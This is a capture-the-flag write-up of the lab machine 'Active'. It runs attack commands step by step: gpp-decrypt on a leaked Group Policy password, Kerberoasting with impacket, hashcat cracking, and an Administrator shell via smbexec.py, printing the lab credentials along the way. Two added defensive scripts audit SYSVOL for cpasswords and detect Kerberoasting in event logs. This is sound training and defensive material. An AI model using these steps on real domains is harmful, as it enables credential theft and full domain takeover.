Summary

Active is an easy Windows box that can be exploited by enumerating the SMB service and finding an encrypted password in one of the files. This can be decrypted, resulting in valid credentials that can be used to enumerate SMB again, this time from an authenticated perspective. Then you can apply Kerberoasting to obtain a TGS hash for the Administrator account, which can be cracked with hashcat. By using smbexec.py from impacket you then obtain a semi-interactive shell.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn [ip]
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

This combination of DNS, Kerberos, LDAP and SMB strongly suggests an Active Directory domain controller. A version scan confirms this:

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)

SMB Enumeration

The OS is also known to be Windows Server 2008 R2 SP1. Let's start by enumerating SMB. After recursively downloading the contents of the shares that can be reached, I always search for keywords such as user and pass first:

grep -i -r "pass"
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:

It found a pass match in this file for the user SVC_TGS. Looking carefully at the path, the file sits under Preferences: it is a Group Policy Preferences (GPP) file. Passwords in these files are stored in the cpassword attribute, encrypted with an AES key that Microsoft itself published (see MS14-025), which is why the value can simply be decrypted with gpp-decrypt:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18
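From the defender's side, the fix for this finding is to remove every leftover cpassword from SYSVOL, and the check is to audit for them. The following audit script is an added example, not part of the original writeup or of any tool it uses; it walks a copy of SYSVOL and reports each Group Policy Preferences file that still carries a cpassword attribute. The sample Groups.xml files, the dummy cpassword value and the second policy GUID are constructed for the example.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Group Policy Preference files that may carry a cpassword attribute (MS14-025).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample Groups.xml, modelled on the one found on the box; the cpassword
# value is a dummy base64 string, not a real encrypted password.
SAMPLE_LEAK_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="ZHVtbXktY3Bhc3N3b3JkLXZhbHVl" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Constructed Groups.xml that only manages group membership and stores no password.
SAMPLE_CLEAN_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group name="Users">
<Properties action="U" groupName="Users"/></Group></Groups>"""

def find_cpasswords(sysvol_root):
    """Walk a SYSVOL copy and return one finding per Properties element with a cpassword."""
    root = Path(sysvol_root)
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # skip a malformed file instead of aborting the audit
        for props in tree.iter("Properties"):
            cpass = props.get("cpassword")
            if cpass is None:
                continue
            account = props.get("userName") or props.get("accountName") or props.get("runAs") or "<unknown>"
            findings.append({"file": path.relative_to(root).as_posix(),
                             "account": account, "has_secret": cpass != ""})
    return findings

def build_sample_sysvol():
    """Write the constructed samples into a temp dir laid out like SYSVOL and return its path."""
    base = Path(tempfile.mkdtemp())
    for guid, xml in (("{31B2F340-016D-11D2-945F-00C04FB984F9}", SAMPLE_LEAK_XML),
                      ("{CONSTRUCTED-GUID-0002}", SAMPLE_CLEAN_XML)):
        target = base / "Policies" / guid / "MACHINE" / "Preferences" / "Groups"
        target.mkdir(parents=True)
        (target / "Groups.xml").write_text(xml, encoding="utf-8")
    return str(base)
```

Point `find_cpasswords` at a real SYSVOL mount (or a downloaded copy) to list the policies that still need cleaning up; an entry with `has_secret` False is a cleared attribute and can be ignored.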

Nice, with these new credentials you should go back to SMB and enumerate as an authenticated user:

smbmap -H 10.129.107.170 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.107.170:445	Name: 10.129.107.170                                    
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY

Now you can read other shares. Use smbclient for this:

smbclient \\\\10.129.107.170\\Users -U SVC_TGS%GPPstillStandingStrong2k18

Now you can get the user.txt with:

smb: \SVC_TGS\Desktop\> mget user.txt

As a side note, you can enumerate the domain users from AD with GetADUsers.py from impacket:

jeroen@kali:~$ /opt/impacket/build/scripts-3.9/GetADUsers.py -all active.htb/SVC_TGS -dc-ip 10.129.107.170
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Querying 10.129.107.170 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 21:06:40.351723  2021-01-22 09:42:30.615553 
Guest                                                                            
krbtgt                                                2018-07-18 20:50:36.972031               
SVC_TGS                                               2018-07-18 22:14:38.402764  2018-07-21 16:01:30.320277

Privilege Escalation

Kerberos uses Service Principal Names (SPNs) to identify the account associated with a particular service instance. Any authenticated domain user can request a service ticket (TGS) for an SPN, and that ticket is encrypted with the service account's password hash, so tickets for user accounts that have an SPN can be requested and cracked offline. This is Kerberoasting, and impacket's GetUserSPNs.py does the lookup and the request in one step:

$ /opt/impacket/build/scripts-3.9/GetUserSPNs.py -request -dc-ip 10.129.100.89 active.htb/SVC_TGS

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d5014bfdf8ab0b63e886d[...]
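The request above leaves a trace on the domain controller: a Security event 4769 (Kerberos service ticket requested) in which a plain user account asks for a ticket to another user account's SPN with RC4 encryption (TicketEncryptionType 0x17, the etype 23 in the $krb5tgs$23$ hash). The following detection is an added example, not part of the original writeup; it runs over a constructed set of 4769 records reduced to the fields the check needs, and flags requesters that fit this pattern while ignoring machine-account and krbtgt tickets.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the encryption type behind a $krb5tgs$23$ hash

# Constructed sample of Security event 4769 records, reduced to the fields the
# check needs; a real export from the DC carries more fields per event.
SAMPLE_4769 = [
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::1"},
    {"EventID": 4769, "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "fileserver$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.51"},
    {"EventID": 4768, "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.51"},
]

def kerberoast_candidates(events, min_services=1):
    """Group RC4 service-ticket requests for user-account SPNs by requesting account.

    Machine accounts (names ending in $) and krbtgt are excluded: RC4 tickets for
    them are routine, whereas an RC4 ticket for a user account's SPN is the
    Kerberoasting pattern. Returns {requester: sorted services} for requesters
    with at least min_services distinct services.
    """
    per_requester = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        try:
            etype = int(ev.get("TicketEncryptionType", ""), 16)
        except ValueError:
            continue  # malformed or missing encryption type
        if etype != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[ev.get("TargetUserName", "?")].add(svc)
    return {user: sorted(svcs) for user, svcs in per_requester.items() if len(svcs) >= min_services}
```

On a 2008 R2 domain where RC4 is still the default, legitimate RC4 tickets for service accounts do occur, so raise `min_services` or baseline known requester/service pairs before alerting, and move service accounts to AES-only keys to take the RC4 signal away entirely.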

This gives you the hash. It can be cracked with hashcat. First look up the hash mode at https://hashcat.net/wiki/doku.php?id=example_hashes (a $krb5tgs$23$ hash is Kerberos 5 TGS-REP etype 23, mode 13100). Then crack it as follows:

hashcat -a 0 -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt -o cracked.txt

This gives the password: Ticketmaster1968. Now that you have Administrator credentials for the Windows host, you can authenticate with smbexec.py:

python3 /opt/impacket/examples/smbexec.py Administrator:Ticketmaster1968@10.129.100.89

To get the root flag, run:

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt

Conclusion

This was a really fun and easy box, I really enjoyed it. I learned some new things, such as Group Policy Preferences, and I didn't know about impacket's smbexec.py yet, so that's useful. Hope you enjoyed the writeup!